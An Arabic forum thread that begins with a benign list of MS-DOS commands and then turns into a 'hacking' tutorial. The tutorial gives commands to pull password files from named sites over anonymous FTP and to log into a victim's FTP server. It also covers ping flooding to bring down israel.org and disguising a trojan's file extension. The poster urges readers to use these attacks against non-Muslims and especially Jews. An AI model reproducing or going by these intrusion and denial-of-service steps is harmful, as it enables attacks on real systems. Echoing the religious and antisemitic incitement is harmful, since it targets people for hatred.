DIR/OS لعرض الفهارس والملفات مرتبة حسب مساحتها بالبايت من الأصغر إلي الأكبر
DIR/AH عرض الملفات المخفية فقط
DIR/AR عرض ملفات القراءة فقط وهي محمية من الإلغاء
DIR/AS عرض ملفات النظام فقط
DIR/AD عرض جميع الفهارس فقط بدون الملفات
DIR/AA عرض الملفات التي تحمل علامة الأرشيف فقط
8-الأمر: MD ( وهو اختصار لكلمة Make Directory ) وهو من الأوامر الداخلية
ووظيفته إنشاء فهرس فرعي من الفهرس الرئيسي أو إنشاء فهرس فرعي من فهرس
فرعي آخر.
9-الأمر : CD (وهو اختصار لكلمةChange Directory ) وهو من الأوامر الداخلية ووظيفته:
1-معرفة الفهرس الحالي
2-الانتقال بين الفهارس إما من:
-رئيسي إلي فرعي
-فرعي إلي رئيسي
وإذا أردنا معرفة الفهرس الحالي الذي نقف عليه نكتب الأمر CD فقط ثم نقوم بالضغط على مفتاح ENTER
10-الأمر RD ( وهو اختصار لكلمة Remove Directory ) وهو من الأوامر
الداخلية ووظيفته حذف أو إزالة الفهرس الفرعي ،ولحذف أو إزالة إي فهرس
فرعي فهناك شرطين:
1- إزالة جميع الملفات والبرامج الموجودة داخل الفهرس الفرعي المراد إزالته.
2- ألا يكون الفهرس الفرعي المراد إزالته هو الذي نقف عليه الآن بل يجب أن نكون على فهرس آخر أعلى منه رتبة.
11-الأمر : COPY وهو من الأوامر الداخلية ووظيفته نسخ ملف أو مجموعة ملفات في نفس الفهرس أو فهرس آخر أو في أسطوانة أخرى.
12-الأمر: COPY CON وهو من الأوامر الداخلية ووظيفته إنشاء وكتابة ملفات نصية جديدة من لوحة المفاتيح وعرضها وطباعتها.
ومن عيوب الأمر COPY CON إنه:
1-لا يمكن الصعود لسطر قد تمت كتابته وتم الضغط على مفتاح الإدخال ENTER.
2-لا يمكن فتح ملف للتعديل به بعد حفظه من نفس الأمر بل يكون من محرر النصوص الموجود مع نظام التشغيل DOS وهو EDIT .
-ملاحظة:لحفظ الملف المنشأ عن طريق الأمر COPY CON قم بعمل إحدى الخطوات التالية:
أ-الضغط على مفتاحي ctrl+z ثم الضغط على مفتاح الإدخال.
ب-الضغط على مفتاح F6 ثم الضغط على مفتاح الإدخال.
13-الأمر: TYPE وهو من الأوامر الداخلية ووظيفته عرض محتويات الملفات النصية على الشاشة.
-ملاحظة:يقوم هذا الأمر بعرض الملفات النصية أما الملفات التي من النوع EXE-COM-SYS فلا يمكن عرضها .
14-الأمر: REN (وهو اختصار لكلمة Rename ) وهو من الأوامر الداخلية ووظيفته تغيير اسم الملف أو نوعه أو كلاهما .
مثال(1):
15-الأمر: DEL ( وهو اختصار لكلمة DELETE ) وهو من الأوامر الداخلية
ووظيفته مسح ملف أو مجموعة ملفات في نفس الفهرس أو في فهرس آخر أو في
أسطوانة أخرى.
ملاحظة: في حال مسح كل الملفات لا بد من ظهور الرسالة التأكيديه التالية:
All Files in directory will be deleted
Are you Sure Y/N
وإذا أردت حذف جميع الملفات أضغط حرف Y وإذا أردت إلغاء العملية اضغط N.
16-الأمر: PATH وهو من الأوامر الداخلية ووظيفته فتح مسار أو عدة مسارات
على مجموعة محددة من الفهارس على أسطوانة واحدة أو عدة أسطوانات وذلك حتى
يسهل التعامل مع الملفات الواقعة عليها من إي موقع ويدرج أمر PATH إلى ملف
Autoexec.bat في سطر واحد (لو تكرر الأمر وبصورة مختلفة سيحفظ منه فقط آخر
صورة له في آخر سطر ) ويوصف بداخله كل الفهارس التي نرغب بالتعامل معها
مباشرة بدون إستخدام الأمر CD للدخول إليها.
-ملاحظات هامة:
1-يوضع أمر PATH داخل ملف Autoexec.bat في سطر واحد .
2-من الممكن كتابة أمر PATH على إي مشغل أقراص في كل مرة تفتح فيها حاسبك.
مثال على ذلك قم بكتابة الأمر PATH على الـ DOS لكي تعرف اسم المسار الموجود بالجهاز.
17-الأمر: MEM وهو من الأوامر الخارجية ووظيفته إعطاء تقارير كاملة عن حالة جميع أنواع الذاكرة.
18-الأمر: MODE وهو من الأوامر الخارجية ووظيفته:
1-التحكم في حجم الكتابة وعرضها على الشاشة.
2-إعطاء تفاصيل عن الملحقات المتصلة بالحاسب وما إذا كانت متصلة معه على التوالي أو على التوازي.
19-الأمر: DOSKEY وهو من الأوامر الخارجية ووظيفته:
1-استدعاء وتعديل اسطر الأوامر وذلك باستدعاء كل ما سبق تنفيذه من أوامر .
2-إنشاء ما يسمى بالماكرو ( Macros ) وهو عبارة عن مجموعة من الأوامر تجمع تحت اسم واحد ويعطى لها مفتاح معين لتشغليها بخطوة واحدة.
-ملاحظة هامة: الأمر DOSKEY يقوم بحجز 4 كليو بايت من الذاكرة الأساسية.
20-الأمر: MSD وهو من الأوامر الخارجية ووظيفته:
1-اكتشاف مواصفات الحاسب من حيث:
( نوع المعالج - حجم الذاكرة - أنواع مشغلات الأقراص - مواصفات نظام العرض - وباقي المكونات).
2-الحصول على تقارير فنية تفيد باكتشاف المشاكل التي حدثت على الحاسب مثل تلف شرائح الذاكرة الـ RAM .
21-الأمر: Command وهو من الأوامر الخارجية ووظيفته تفسير أوامر نظام التشغيل الداخلي.
22-الأمر: DEFRAG وهو من الأوامر الخارجية ووظيفته تتمثل برفع كفاءة
التشغيل للقرص الصلب أو القرص المرن حيث إنه يقوم بتجميع الملفات المبعثرة
إلي جوار بعضها وبالتالي توفير مساحة إضافية.
23-الأمر: FORMAT وهو من الأوامر الخارجية ووظيفته تهيئة الأسطوانة الصلبة أو المرنة.
24-الأمر: LABEL وهو من الأوامر الخارجية ووظيفته إعادة تسمية الاسطوانة أو تعديل إسمها أو مسحه.
25-الأمر: DISKCOPY وهو من الأوامر الخارجية ووظيفته نسخ أسطوانة مرنة على
أخرى مطابقة لها تماما من حيث النوع والحجم والسعة ويقوم بنسخ كامل
الملفات حتى المخفية.
ملاحظة : (الأمر COPY والأمر XCOPY لا يستطيعان نقل الملفات المخفية).
26-الأمر: CHKDSK وهو من الأوامر الخارجية ووظيفته فحص الأسطوانة وإعطاء تقرير عن حالتها.
27-الأمر: UNFORMAT وهو من الأوامر الخارجية ووظيفته إستعادة محتويات أسطوانة ما كانت قد مسحت جميع محتوياتها من خلال الأمر FORMAT.
-ملاحظة هامة:
يستطيع الأمر UNFORMAT إعادة محتويات الأسطوانة التي سبق عمل تهيئة لها
ولكن بشرط عدم إستخدامها مسبقاً مع الأمر FORMAT عند التهيئة وإلا فأنه
يستحيل إعادة محتويات الأسطوانة كما كانت .
28-الأمر: SYS وهو من الأوامر الخارجية ووظيفته:
1-نسخ ملفات نظام التشغيل MS-DOS إلي أسطوانة ما.
2-نسخ ملف COMMAND.COM إلي أسطوانة ما.
29-الأمر: DISKCOMP وهو من الأوامر الخارجية ووظيفته المقارنة بين اسطوانتين متطابقتين .
ملاحظة: هذا الأمر لا ينفع التعامل به مع أقراص صلبة على الإطلاق.
30-الأمر: SCANDISK وهو من الأوامر الخارجية ويستخدم لاكتشاف إي أجزاء تالفة على القرص .
31-الأمر: FDISK وهو من الأوامر الخارجية ووظيفته تهيئة وإعداد القرص الصلب للتعامل مع نظام التشغيل DOS.
32-الأمر: TREE وهو من الأوامر الخارجية ووظيفته عرض أسماء الفهارس المكونة لشجرة الفهارس وكذلك عرض مساراتها.
33-الأمر: MOVE وهو من الأوامر الخارجية ووظيفته نقل ملف أو أكثر أو فهرس فرعي من مكان لآخر.
34-الأمر: DELTREE وهو من الأوامر الخارجية ووظيفته حذف فهرس فرعي بما يحتويه حتى لو كان بداخله ملفات.
35-الأمر: UNDELETE وهو من الأوامر الخارجية ووظيفته استعادة الملفات الممحاة بواسطة الأمر DEL.
ملاحظات هامة:
1-عندما يتم حذف ملف بالأمر DEL فإن نظام التشغيل DOS يقوم بتغيير الحرف الأول من هذا الملف وتحويله إلي علامة استفهام ؟.
2-يمكن استرجاع ملف قبل تخزين إي ملف آخر جديد على الملف السابق.
36-الأمر: ATTRIB وهو من الأوامر الخارجية ووظيفته يعرض ويتحكم في صفحات
الملف وذلك بتغيير خصائصه كجعله مثلاً ملف خفي أو ملف نظام أو قابل
للقراءة فقط أو غير ذلك.
37-الأمر: PRINT وهو من الأوامر الخارجية ووظيفته طباعة الملفات النصية فقط.
38-الأمر: XCOPY وهو من الأوامر الخارجية ووظيفته نسخ مجموعة من الملفات أو الفهارس .
39-الأمر: EDIT وهو من الأوامر الخارجية وهو عبارة عن محرر نصوص تابع
لنظام التشغيل DOS والذي من خلاله تتمكن من كتابة وتعديل الملفات.
-ملاحظات هامة:
يعالج هذا الأمر جميع عيوب الأمر COPY CON حيث أنه باستخدامه يمكن عمل الآتي:
1-فتح ملف سبق حفظه والتعديل فيه.
2-التحرك داخل الملف يميناً ويساراً ولأعلى ولأسفل .
3-يتم حفظ الملف باستخدام Alt+F ثم نختار أمر Save ثم كتابة أسم الملف.
-يتم الخروج من الأمر باستخدام Alt+F ثم نختار أمر Exit.
-لكي يعمل الأمر EDIT لابد من وجود ملف QBASIC.EXE. (7) (87)
هذا هوه صحيح هي صعبة بس تشغيل دماغ تصير زلاطة...منقول...تحياتي




















[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Admin
Admin
Admin


عدد الرسائل : 6208
العمر : 52
الموقع : https://borae.yoo7.com
تاريخ التسجيل : 08/06/2008

من  اسرار المحترفين فى النت  Empty
مُساهمةموضوع: رد: من اسرار المحترفين فى النت    من  اسرار المحترفين فى النت  Emptyالأربعاء 14 يوليو 2010 - 20:26

مع هذا الشرح بإمكانك ان تكون هكر قوي جدا تابع الشرح فقط



المحترفين
)()(أخطر استعمالات وأوامر الـDoS والمتداولة بين الهكرز)()( =][أدخل واتعلم][=

أوامر DoS مع الشرح سوف تجدها في هذا الموقع

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

/***********************************************/

=========================
هذا المعلومات أنا محضرها لكم من أغلب المنتديات وأتمنى تعجبكم وتستفيدون منها

بسم الله الرحمن الرحيم

* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع

User name-Password

وهما يكونان محفوظين في ملف يسمي

PASSWDغالبا

بعض المواقع تضع هذا الملف في الإف تي بي

ما هو إف تي بي؟

FTP=File Transfer Protocol بروتوكول نقل الملفات

تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت

start==>run إبدأ ثم تشغيل

واكتب telnet

سيفتح التلنت اضغط علىRemote System ==> connect

ثم اكتب الموقع في Host Name مثلا

kahane.org أو الآيبي الخاص به

وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي

ثم اضغط connect

وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code

user anonymous

ثم انتر بعدها يطلب السيرفر كلمة السر اكتب

pass [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

اكتب أي بريد ككلمة سر وطبعا سيكون وهميا

ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..

بعدها سنحصل على ملف الباسوورد

قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل

cute ftp - ws_ftp

مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

لتحصل على الملف في التلنت اكتب

retr /etc/passwd

/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع

Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز scripts/passwd

وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها

= = = = تابع = = = =

أغلب استخدامات الدوز والمعروفة

1-command هذا الامر يدخلك الى موجه الدوس .
2-regedit هذا الامر لمحرر سجل الوندووز ( الشجرة ) .
3-icwscrpt هذا الامر خاص بنسخ ملفات الـ dll
4-scandskw هذا الامر لعمل تفحص للاقراص .
5-imgstart هذا الأمر لتشغيل قرص ويندووز المضغوط
6-msiexec حقوق تركيب ويندووز .
7- : d : c للوصول السريع إلى الدرايفرات
8-hwinfo /ui لمعرفة معلومات عن جهازك وفحصه بالكامل عن طريق الدوس واعداد تقرير بذلك
9-cleanmgr وهذا الامر يشغل برنامج تنظيف القرص
10-packager وهذا الامر لبرامج يغير الايقونات
11-recent هذا الامر لإستعراض ملف المستندات ( الموجود في قائمة إبدأ
12-- sysedit هذا الامر(لفتح محرر تكوين النظام) لويندوز 98. حيث يقوم بفتح هذه النوافذ الخمسة التالية :
protocol.ini
system.ini
win.ini
config.sys
autoexec.bat
13-sfc وهذا الامر لإسترجاع بعض ملفات الـ dll عندما تتلف
14-taskman وهذا الامر لمشاهدة البرامج التي تعمل حاليا
15-debug لمعرفة نوع كرت الفيديو او الشاشة
16-DEFRAG لإلغاء تجزئة القرص
17-DVDPLAY مشغل افلام dvd يعمل مع ملينيوم
18-winipcfg لمعرفة IP
19-TEMP للوصول الى ملفات الويندوز المؤقتة
20-- tuneup هذا الامر لتشغيل برنامج معالج الصيانة
21-mobsync هذا الامر لظهور برنامج تنزيل الصفحات من الانترنت و تصفحها بدون اتصال
22-cdplayer هذا الامر لتشغيل برنامج قاريء الأقراص المضغوطة
23-ftp هذا الامر لجلب البرامج بسرعه من الدوس .
24-Tips.txt هذا الأمر يظهر بعض أسرار ويندووز 98
25-- telnet وهذا الامر يشغل برنامج telnet
26-progman وهذا الامر يأخذك الى قائمة البرامج.
27-drwatson أداة لتشخيص أخطاء النظام.
28-cliconfg.
29-- mkcompat.
30-CVT1.EXE
هذا الأمر لتشغيل معالج محول محركات الأقراص إلى نظامfat32
31-SCANREG
مدقق تسجيل ويندوزلتفحص التسجيل
32-Tune up
هذا الأمر لتشغيل معالج الصيانة ومن مهامه:
1/ تسريع البرامج المستخدمة بشكل متكرر
2/ تدقيق القرص الثابت لاستكشاف الأخطاء
3/ حذف الملفات الغير ضرورية من الجهاز
ويمكن استخدام هذا الأمر لنفس الغرض TUNEUP.EXE
34-SYSEDIT
محرر تكوين النظام لا ينصح
بتغيير أي شيء فيها إلا من قبل الخبراء أو من لديهم معرفة تامة بالتعديلات
التي يريدون عملها على هذا المحرر

35-VCMUI
أداة تعارض الإصدارة وظيفتها التحقق من الملفات التي لديها رقم إصدارة احدث أو كانت بلغة مختلفة قبل تثبيت النظام لاستعادتها
شرح مبسط عن هذه الأداة:
أثناء تثبيت برامج جديدة، بما فيها Windows 98، قد يتم الكشف عن الإصدار القديمة لملفات
البرامج واستبدالها بالإصدار الجديدة. ويتم إنشاء نسخة احتياطية للإصدارات السابقة وتُحفظ
على القرص الثابت.
في حال وجدت تعارضات مع ملفات النظام أو ملفات البرامج بعد تثبيت تطبيق، تُستخدم إدارة تعارض
الإصدار لاستعادة ملف النسخة الاحتياطية.
وتذكر إدارة تعارض الإصدار كافة ملفات النسخة الاحتياطية، وتاريخ إجراء النسخة الاحتياطية،
وأرقام الإصدار لملفات النسخة الاحتياطية والملفات الحالية. وعند استعادة ملف النسخة الاحتياطية،
حينئذ، يتم إنشاء نسخة احتياطية للإصدار الحالي. ويبقى الإصداران متوفرين.
ملاحظة مهمة : يجب استخدام هذه الأداة من قبل شخص لديه معرفة متقدمة بالنظام
36-UPWIZUN
إلغاء تثبيت معالج التحديث وظيفته كالتالي:
ربما قد استخدمت Windows Update لتثبيت إصدار محدّث من أداة تصحيح،
أو برنامج تشغيل، أو أداة نظام. إذا قررت فيما بعد إلغاء تثبيت الإصدار الجديد،
ولم تتمكن من إعادة تأسيس الاتصال بإنترنت، استخدم إلغاء تثبيت معالج التحديث
للعودة إلى الإصدار السابق.
37-Asd.exe
أداة تشغيل عامل برنامج تشغيل التخطي التلقائي
وظيفته: يعرّف برنامج تشغيل التخطي التلقائي (ASD) حالات الفشل
التي تسببت في توقف Windows عن الاستجابة في عمليات بدء التشغيل السابقة
ويضع عليها علامات بحيث يتم تجاوزها في عمليات بدء التشغيل اللاحقة.
يذكر ASD كافة الأجهزة أو العمليات التي فشل بدء تشغيلها. ويمكنك استخدام ASD لتمكين
أي جهاز تم تعطيله سابقاً بواسطة ASD، وسيحاول Windows استخدام الجهاز
في محاولة بدء التشغيل التالية. وفي حال الفشل، يتوقف الكمبيوتر عن الاستجابة.
وعند إعادة تشغيل الكمبيوتر مرة أخرى، يمنع ASD تشغيل العملية سامحاً لك ببدء تشغيل الكمبيوتر

من العقرب الأحمر

--------------------------------------------


---------------------------------------------------------------------

الدوس هو برنامج يأتي مع الويندوز وهو عبارة عن مواجهه خطية يتلقى الأوامر من المستخدم ويقوم بتنفيذها.هذا باختصار
والهكر عن طريق الدوس(DOS) له تأثير مرعب وقوي جداً وهذه بعض أوامر الدوس حتى نتعرف عليه أكثر:-
لتشغيل الدوس إذهب إلى إبدأ>تشغيل>وأكتب command أو (start>run

---------------------------------------------------------------------
1-أكتب الأمرmsconfig لمعرفة
البرامج اللتي تعمل وقت التشغيل او عند بدء التشغيل ولتتجنب الاختراق
يمكنك عن طريق هذا الامر ثم إذهب إلى بدء التشغيل وانظر الى البرامج
العامله وقم باطفاء أي برنامج غريب يعمل عند بدء التشغيل.

2- الأمر Control لفتح لوحة التحكم .
3- الأمر telnet لفتح نافذة التلنت والاتصال بجهاز بعيد بمعرفة الاي بي والبورت.
4- الأمر pi [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] لمعرفة IP الموقع ويستعمل في الهجوم ضد الموقع. ملاحظه/هناك مسافه بين ping http. يمكنك تغير (israel.org) بأي موقع.
5- الأمر ping
-twww.israel.org لارسال رسايل تتسبب في انهيار الموقع عند اجتماع الكثير
من المستخدمين على القيام بها ضد موقع معين .

6- الأمر netstat -n لاظهار
IP أي شخص انت ترسل له ملف عبر الماسنجر اكتب هذا الامر بينما انت ترسل
وسيظهر IP تبعه في موجة الدوس والاي بي تبعك انت ايضا.

7- الأمر winipcfg لمعرفة IP الخاص بك.
8- الأمر System.ini انظر الى السطر السادس ولابد ان يكون هكذا user.exe=user.exe والا فجهازك مخترق
9- الأمر regedit ثم اتبع الاتي

HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>Curr
entVersion>Run واي ملف يحمل امتداد exe واسمه name قم بحذفه فهو
الباتش تقريبا .


---------------------------------------------------------------------

اما بخصوص بينق تدمير المواقع فهي كالتالي:-
1- pi [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] لمعرفة IP الموقع.
2- ping [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] يحمل الضغط على الموقع المستضيف.
3- ping -t -a [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] يقوم بإعطاء أوامر إلى المستضيف.
4- ping -w timeo [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] قوم بتوضيح سرعة الموقع الحالية.

---------------------------------------------------------------------

10- كيف تستخدم اوامر الدوس في بعض الهجوم
con/con.wav
com1/com1.wav
com2/com2.wav
التفاصيل هنا

================================

طريقة تغيير امتداد exe عن طريق الدوس جديد

اتبع الخطوات التالية:-
إبدأ>تشغيل>وأكتب
command أو (start>runcopy server.exe server.com طبعا server هو اسم
الباتش تبعك وممكن تغير الامتداد الى com,scr,bat إخواني المسلمين
لاتستخدموا هذه الطريقة ضد إخوانكم المسلمين وانما استخدموها ضد الكفار
كما هو هدف الموقع وبخوصا اليهود قاتلهم الله ولعنهم.




*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=




*=*=*=*=*


()()(هجوم الدوز المخيف)()(

---------------------------------------------------------------------

هجوم DOS هو واحد من أخطر
أنواع الهجمات الموجودة في الفضاء الافتراضي، وهو يكلف عالم الأعمال
ملايين الدولارات كل عام، كما يشكل تهديداً حقيقياً لأي نظام أو شبكة
موجودة على طريق المعلومات السريع، تتعلق هذه التكلفة بزمن تعطل النظام،
ضياع الموارد، والعمل الفيزيائي اللازم لتحليل والرد على هذا النوع من
الهجوم.


ليس المقصود بـ DOS نظام
التشغيل الشهير من مايكروسوفت، إنما المقصود هو هجوم رفض الخدمة Denial of
Service Attack ، حيث يقوم المخترق بهذا الهجوم بهدف التخريب والتدمير،
وهو لا يحتاج إلى مهارة عالية أو معرفة تقنية عميقة لأن الأدوات الضرورية
متاحة ويمكن بسهولة تحميلها من الإنترنت.


أصابت هجمات DOS العديد من
المواقع المهمة والضخة مثل CNN, Yahoo, Bay, ZDNet…. وغيرها، مما أدى إلى
توقفها تماماً عن العمل لفترات مختلفة، حدث ذلك في شهر فيبراير من العام
2000.


يعتمد هذا الهجوم على
استغلال نقاط الضعف في بروتوكول (TCP/IP) المصمم للعمل أساساً في بيئة
آمنة مفتوحة، مما جعله يحوي العديد من الثغرات التي يمكن أن يستخدمها
المخترقين Crackers.


من المفارقات في هذا الموضوع
أن المخترقين المحترفين وحتى المخربين منهم يعتبرون هذا النوع من الهجوم
أنه رديئ ويسخرون ممن يقومون به باعتباره أنه اسلوب المبتدئين، ولا يحتاج
إلى معرفة وخبرة.

---------------------------------------------------------------------
يوجد العديد من أنواع الهجوم DOS سوف أحاول أن أسردها باختصار:
1-استهلاك عرض الحزمة Baud rate consumption
حيث يقوم المهاجم باستهلاك
كامل عرض الحزمة في نظام شبكة الضحية وذلك باغراق شبكة الضحية بكمية هائلة
من الطلبات مثل: GET, SYN... وغيرها، مما يؤدي إلى استهلاك كامل عرض
الحزمة وإيقاف الموقع المستهدف أو النظام المهاجم تماماً عن العمل، ويكون
ذلك إما بالهجوم مباشرة Direct Attack حيث ينتصر في هذه الحالة من لديه
عرض حزمة أكبر ( مثلاً 56-Kbps في مواجهة 128-Kbps )، أو القيام بربط
العديد من المواقع من أجل إغراق نظام الضحية حيث يقوم المهاجم باستخدام
أنظمة البث broadcast في شبكات أخرى من أجل تضخيم الهجوم، ويستفيد في هذه
الحالة من عرض حزمة تلك الشبكة.

من الجدير بالذكر في هذا
الصدد أن برنامج الدرة من عمران يستخدم هذا النمط من الهجوم، على الرغم من
أنني لم أقم بعد بتحليله كاملاً بعد، إلا أنني أستطيع القول من التحليل
المبدئي على أنه يقوم بارسال طلبات GET حسب بروتوكول HTTP إلى النظام
المستهدف وهو في هذه الحالة Web server مما يؤدي إلى زيادة الحمل على
المزود المستهدف، يقوم البرنامج بذلك عن طريق إنشاء عدة Threads تعمل كل
منها على أنها Process مستقلة تقوم بارسال طلبات GET المذكورة، إن فعالية
هذا الهجوم قليلة حيث أن المستخدم مهما استخدم من عرض الحزمة لديه فلن
يتمكن أبدا من مجاراة عرض حزمة المواقع الكبيرة، إلا أن القوة الحقيقية
تكون عند التنسيق بين المئات أو الآلاف من مستخدمي هذا البرنامج بحيث يتم
الهجوم على هدف محدد في وقت معين بدقة، وهذا مايقوم به برنامج الدرة حيث
أنه يقوم بالاتصال بالموقع xxxxx.xxx (الموقع ليس سريا ويمكن بسهولة
معرفته إلا أنني لن أذكره إلا إذا رغب عمران بذلك) ويحصل منه على أهداف
الهجوم، ثم يقوم بالهجوم. (شكرا لـ Sp@nder على تزودي بنسخة من برنامج
الدرة).


2-استهلاك الموارد: هذا
النوع من الهجوم يعتمد على استهلاك الموارد في نظام الضحية عوضا عن
استهلاك عرض الحزمة. أهم الموارد التي يتم استهدافها هي: CPU, Memory,
Kernel, File system ... وغيرها، و يؤدي انخفاض الموارد في النظام إلى عدم
استقراره وانهياره في نهاية الأمر.


3- الثغرات البرمجية أو في مكونات النظام:
لا يوجد نظام أو برنامج خالي
تماماً من الثغرات مهما بلغت دقة تصميمه، يوجد عدة طرق لاستغلال هذه
الثغرات مثلا بارسال Packets غير متوفقة مع المعايير القياسية لـ بروتركول
TCP/IP المحددة من قبل RFC إلى نظام الضحية مما يؤدي إلى نتائج تختلف حسب
نوع البرنامج من توقف الخدمة، أو توقف النظام، أو ضياع المعلومات، أو
فيضان المكدس stack وغير ذلك.

والأسوأ من هذا استخدام
الثغرات الموجودة ضمن المكونات الصلبة للنظام Hardware مثل ثغرة Pentium
f00f DOS الشهيرة، حيث يؤدي تنفيذ شفرة الآلة opcode التالية 0xf00fc7c8
على أنظمة تعتمد معالجات بنتيوم إلى توقف النظام عن العمل تماماً.

لسوء الحظ لا يمكن الكشف عن
هذا النوع من الثغرات إلا بعد وقوع الهجوم. ولا أحد يعلم تماماً فيما إن
كانت هذه الثغرات موجودة عن طريق الخطأ أم أنها موضوعة هناك عن عمد لسبب
ما...... ؟؟؟؟؟!!!!!!! الله أعلم


كما يوجد أنواع أخرى من هجمات DOS إلا أنها أقل فعالية وغير مستخدمة على نطاق واسع.

كنت أنوي أن أتحدث عن طرق
الحماية من هجوم رفض الخدمة إلا أن الموضوع طويل ويحتاج إلى عدة مقالات
لمناقشته، إلا أن المهم بالنسبة للمستخدم المنزلي هو إخفاء رقم IP الخاص
به واستخدام أحد برامج الجدران النارية مثل ZoneAlarm, PcConseal
...وغيرها، وطبعا أخذ الحذر في مواقع المنتديات والدردشة وخاصة منتدى
الشبكات والسيرفرات في موقع فلاشيات ;-)

---------------------------------------------------------------------

مايتطسع فعله netstat

==============================================

NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة
NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها
NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام
NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة
NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك
NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك
NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة

===============================================


درس مهم لتعلم الاختراق بالtelnet
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

درس مهم لتعلم الاختراق بالnetbios
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

++++++++++++

FTP
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت
21
مفتوح و هو البورت الخاص بــ
FTP
و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها
Superscanne
بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي
إضغط على
Start
ثم
Run
ثم اكتب
ftp –n
تطلع لك نافدة في الدوس مكتوب عليها
FTP&g
لحد هنا كل شيء تمام
و بعدين اكتب
Open
ثم إضغط على
إدخال
Enter
تتحصل عب النتيجة التالية
FTP&g
To
أكتب جنب
To
رقم IP الضحية ثم إضغط على إدخال
و الحين اهم جزء

إدا تحصلت على هذا الرد فقد تخطيت خطوة
Connected to [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
220 websrv1 Microsoft FTP Service (Version 4.0).
و الآن أكتب الكتابة التالية
ftp&gquote user ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
331 Anonymous acces allowed, send identify (e-mail name) as password.
و الآن أكتب الكتابة التالية
ftp&gquote cwd ~root
إدا تحصلت على هذا الرد فقد تخطيت خطوة
530 Please login with USER and PASS
ثم أكتب الكتابة التالية
ftp&gquote pass ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
و نجحت في الإقتحام يعني الاختراق

230 Anonymous user logged in.
مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه
ما عليك الآن الا ان تقوم بإستعمال
اوامر الفتيبي
و طبعا لن امر عليها مرور
الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون
ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من
20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان
كذا

قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق

Pwd
لكي تعر ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب بتاع جهازك
مثال
Get black.exe
Put
العملية الع**ية ل
Get
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع الإتصال مع الضحية


هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها
Codes: Signification:
110 Restart marker reply.
120 Service ready in nnn minutes. (nnn est un temps)
125 Data connection already open; transfer starting.
150 File status oka about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message.
215 NAME system type.
220 Service ready for new user.
221 Service closing control connection.
225 Data connection open; no transfer in progress.
226 Closing data connection.
227 Entering passive mode (h1, h2, h3, h4, p1, p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pendingfurther information.
421 Service not available, closing control connection.
425 Can't open data connection.
426 Connection closed; transfer aborded.
450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
451 Requested action aborded: local error processing.
452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action)
500 Syntax error, command unrecognized.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
